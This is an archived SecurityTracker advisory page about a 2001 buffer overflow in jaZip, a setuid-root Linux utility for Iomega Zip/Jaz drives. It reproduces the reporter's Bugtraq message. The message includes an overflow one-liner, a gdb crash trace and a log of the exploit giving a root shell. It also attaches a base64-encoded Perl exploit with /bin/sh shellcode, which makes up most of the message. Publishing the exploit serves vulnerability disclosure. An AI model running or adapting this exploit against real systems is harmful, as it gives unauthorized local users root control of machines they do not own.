SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   JaZip Vendors:   Smith, Jarrod
JaZip Linux Utility for Iomega Zip/Jaz Drives May Give Local Users Root Access
SecurityTracker Alert ID:  1000588
SecurityTracker URL:  http://securitytracker.com/id/1000588
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 15 2001
Impact:   Root access via local system, User access via local system
Exploit Included:  Yes  

Description:   JaZip, a Linux utility for managing an Iomega Zip or Jaz drive, reportedly contains a buffer overflow that can allow local users to gain JaZip privileges. Because the utility is often installed setuid root, root privileges may be obtained.

The author indicates that the tested rpm version was:

ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm

The author has created a Perl Exploit (see the original message).

Impact:   A local user could obtain privilegs of the JaZip program, which may be setuid, giving a local attacker root privileges.
Solution:   No solution was available at the time of this entry.
Vendor URL:  unknown (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any)

Message History:   None.


 Source Message Contents

Subject:  Vulnerability in jaZip.


--------------Boundary-00=_OTW5OLAYS3R76NBXB0LW
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

Dear, Bugtraq.

jaZip is a program for managing an Iomega Zip or Jaz drive.
It is often installed setuid root - and because of a buffer
overflow it is possible for regular users to become root.

Please excuse me if this was know. Please note that I can not
guarantee that this information is correct.

Tested rpm:
ftp://ftp.linux.com/pub/mirrors/turbolinux/turbolinux/TurboLinux/
RPMS/jaZip-0.32-2.i386.rpm

  [root@localhost /root]# export DISPLAY=`perl -e '{print "A"x"2100"}'`
  [root@localhost /root]# gdb /usr/X11R6/bin/jazip
  GNU gdb 19991004
  Copyright 1998 Free Software Foundation, Inc.
  (gdb) r
  Starting program: /usr/X11R6/bin/jazip

  Program received signal SIGSEGV, Segmentation fault.
  0x41414141 in ?? ()
  ----
  [teleh0r@localhost teleh0r]$ rpm -q jaZip
  jaZip-0.32-2
  [teleh0r@localhost teleh0r]$ ./jazip-exploit.pl
  Address: 0xbffff7ac
  bash#

Exploit attached.

Sincerely yours,
teleh0r

--
To avoid criticism, do nothing, say nothing, be nothing.
--------------Boundary-00=_OTW5OLAYS3R76NBXB0LW
Content-Type: application/x-perl;
  name="jazip-exploit.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="jazip-exploit.pl"

IyEvdXNyL2Jpbi9wZXJsCgojIyBqYVppcCBFeHBsb2l0IC8gVGVzdGVkIHZlcnNpb246IGphWmlw
LTAuMzItMiAvIGFubm8gMjAwMAojIyB0ZWxlaDByQGRvZ2xvdmVyLmNvbSAvIGh0dHA6Ly90ZWxl
aDByLmNqYi5uZXQvCgokc2hlbGxjb2RlID0gICAgICAgICAgICAgICAgICAgICAjIFNoZWxsY29k
ZSBieTogVGFlaG8gT2gKICAgICJceGViXHgxZiIuICAgICAgICAgICAgICAgICAgIy8qIGptcCAw
eDFmICAgICAgICAgICAgICAqLwogICAgIlx4NWUiLiAgICAgICAgICAgICAgICAgICAgICAjLyog
cG9wbCAlZXNpICAgICAgICAgICAgICovCiAgICAiXHg4OVx4NzZceDA4Ii4gICAgICAgICAgICAg
ICMvKiBtb3ZsICVlc2ksMHg4KCVlc2kpICAgKi8KICAgICJceDMxXHhjMCIuICAgICAgICAgICAg
ICAgICAgIy8qIHhvcmwgJWVheCwlZWF4ICAgICAgICAqLwogICAgIlx4ODhceDQ2XHgwNyIuICAg
ICAgICAgICAgICAjLyogbW92YiAlZWF4LDB4NyglZXNpKSAgICovCiAgICAiXHg4OVx4NDZceDBj
Ii4gICAgICAgICAgICAgICMvKiBtb3ZsICVlYXgsMHhjKCVlc2kpICAgKi8KICAgICJceGIwXHgw
YiIuICAgICAgICAgICAgICAgICAgIy8qIG1vdmIgJDB4YiwlYWwgICAgICAgICAqLwogICAgIlx4
ODlceGYzIi4gICAgICAgICAgICAgICAgICAjLyogbW92bCAlZXNpLCVlYnggICAgICAgICovCiAg
ICAiXHg4ZFx4NGVceDA4Ii4gICAgICAgICAgICAgICMvKiBsZWFsIDB4OCglZXNpKSwlZWN4ICAg
Ki8KICAgICJceDhkXHg1Nlx4MGMiLiAgICAgICAgICAgICAgIy8qIGxlYWwgMHhjKCVlc2kpLCVl
ZHggICAqLwogICAgIlx4Y2RceDgwIi4gICAgICAgICAgICAgICAgICAjLyogaW50ICQweDgwICAg
ICAgICAgICAgICovCiAgICAiXHgzMVx4ZGIiLiAgICAgICAgICAgICAgICAgICMvKiB4b3JsICVl
YngsJWVieCAgICAgICAgKi8KICAgICJceDg5XHhkOCIuICAgICAgICAgICAgICAgICAgIy8qIG1v
dmwgJWVieCwlZWF4ICAgICAgICAqLwogICAgIlx4NDAiLiAgICAgICAgICAgICAgICAgICAgICAj
LyogaW5jICVlYXggICAgICAgICAgICAgICovCiAgICAiXHhjZFx4ODAiLiAgICAgICAgICAgICAg
ICAgICMvKiBpbnQgJDB4ODAgICAgICAgICAgICAgKi8KICAgICJceGU4XHhkY1x4ZmZceGZmXHhm
ZiIuICAgICAgIy8qIGNhbGwgLTB4MjQgICAgICAgICAgICAqLwogICAgIi9iaW4vc2giOyAgICAg
ICAgICAgICAgICAgICAjLyogLnN0cmluZyBcIi9iaW4vc2hcIiAgICovCgoKJHJldCA9IDB4YmZm
ZmY3YWM7ICAjIE1heSBoYXZlIHRvIGJlIG1vZGlmaWVkLgokbGVuID0gMjEwMDsKJG5vcCA9ICdB
JzsKCmlmIChAQVJHViA9PSAxKSB7CiAgICAkb2Zmc2V0ID0gJEFSR1ZbMF07Cn0KCmZvciAoJGkg
PSAwOyAkaSA8ICgkbGVuIC0gbGVuZ3RoKCRzaGVsbGNvZGUpIC0gMTAwKTsgJGkrKykgewogICAg
JGJ1ZmZlciAuPSAkbm9wOwp9CgokYnVmZmVyIC49ICRzaGVsbGNvZGU7CgpwcmludCgiQWRkcmVz
czogMHgiLCBzcHJpbnRmKCclbHgnLCgkcmV0ICsgJG9mZnNldCkpLCAiXG4iKTsKJG5ld19yZXQg
PSBwYWNrKCdsJywoJHJldCArICRvZmZzZXQpKTsKJGJ1ZmZlciAuPSAkbm9wIHggMzsgIyBNYXkg
aGF2ZSB0byBiZSBtb2RpZmllZC4KCmZvciAoJGkgKz0gbGVuZ3RoKCRzaGVsbGNvZGUpOyAkaSA8
ICRsZW47ICRpICs9IDQpIHsKICAgICRidWZmZXIgLj0gJG5ld19yZXQ7Cn0KCmlmICgkRU5WeydE
SVNQTEFZJ30pIHsKICAgIGRlbGV0ZSgkRU5WeydESVNQTEFZJ30pOwp9Cgpsb2NhbCgkRU5WeydE
SVNQTEFZJ30pID0gJGJ1ZmZlcjsKZXhlYygiL3Vzci9YMTFSNi9iaW4vamF6aXAiKTsK

--------------Boundary-00=_OTW5OLAYS3R76NBXB0LW--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC